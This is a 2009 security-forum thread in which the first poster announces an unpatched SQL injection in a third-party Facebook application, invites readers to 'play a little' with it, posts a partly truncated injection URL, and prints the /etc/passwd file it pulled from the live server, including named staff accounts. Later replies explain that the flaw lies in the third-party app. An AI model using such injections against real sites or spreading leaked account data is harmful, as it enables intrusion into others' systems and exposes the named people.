-
September 16th, 2009, 10:48 AM
#1
Facebook SQL Injection
**t34b4g5's Edit, i am allowing this thread to remain, see post below ***
I'm not sure if i'm allowed to post this here, if this is against the rules just remove the thread
A team member discovered this a few weeks ago and it still seems to be unpatched
Be my guest and play a little with them, a site big as Facebook should be aware of security, hopefully their box is hardened
***Click at your own Risk***
http://apps.facebook.com/newscloud/?...737764%29,10--
***Click at your own Risk***
Code:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
user:x:1000:1000:user,,,:/home/user:/bin/bash
sshd:x:100:65534::/var/run/sshd:/usr/sbin/nologin
todd:x:1001:1001:Todd Weaver,,,:/home/todd:/bin/bash
jeff:x:1002:1002:Jeff Reifman,,,:/home/jeff:/bin/bash
mysql:x:101:103:MySQL Server,,,:/var/lib/mysql:/bin/false
Debian-exim:x:102:104::/var/spool/exim4:/bin/false
statd:x:103:65534::/var/lib/nfs:/bin/false
identd:x:104:65534::/var/run/identd:/bin/false
adam:x:1003:1003:Adam Faja,,,:/home/adam:/bin/bash
rick:x:1004:1004:Rick Kowal,,,:/home/rick:/bin/bash
russell:x:1005:1005:Russell Branca,,,:/home/russell:/bin/bash
daniel:x:1006:1006:Daniel MacDonald,,,:/home/daniel:/bin/bash
postfix:x:105:106::/var/spool/postfix:/bin/false 4
Last edited by t34b4g5; September 16th, 2009 at 11:38 AM.
silent play in the shadow of power...
-
September 16th, 2009, 11:35 AM
#2
-
September 18th, 2009, 06:18 PM
#3
actually, what you've found is a injection in a third party app on Facebook
http://developers.facebook.com/
apps.facebook.com is the domain name, but that's not their data.
-
September 18th, 2009, 10:44 PM
#4
Considering what the 3rd party app is (newscloud), it doesn't really surprise me.
If I remember correctly (been a whild since I looked at it), there is a problem with the facebook API that allows any member to post their own information. Instead of setting it up like the members are contributers, it is set up like they are members, so "need" direct access to the database. Even if facebook fixed the problem, I'm sure a lot of developers didn't do it right. You can probably get the same type of results from most apps that allow people to submit their own content on facebook.
\"Ignorance is bliss....
but only for your enemy\"
-- souleman
Similar Threads
-
By catch in forum The Security Tutorials Forum
Replies: 27
Last Post: August 9th, 2006, 08:01 AM
-
By mikester2 in forum Other Tutorials Forum
Replies: 5
Last Post: January 31st, 2005, 01:16 PM
-
By CXGJarrod in forum Microsoft Security Discussions
Replies: 0
Last Post: July 23rd, 2003, 10:00 PM
-
By sambeckett in forum AntiOnline's General Chit Chat
Replies: 1
Last Post: February 13th, 2003, 08:53 PM
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|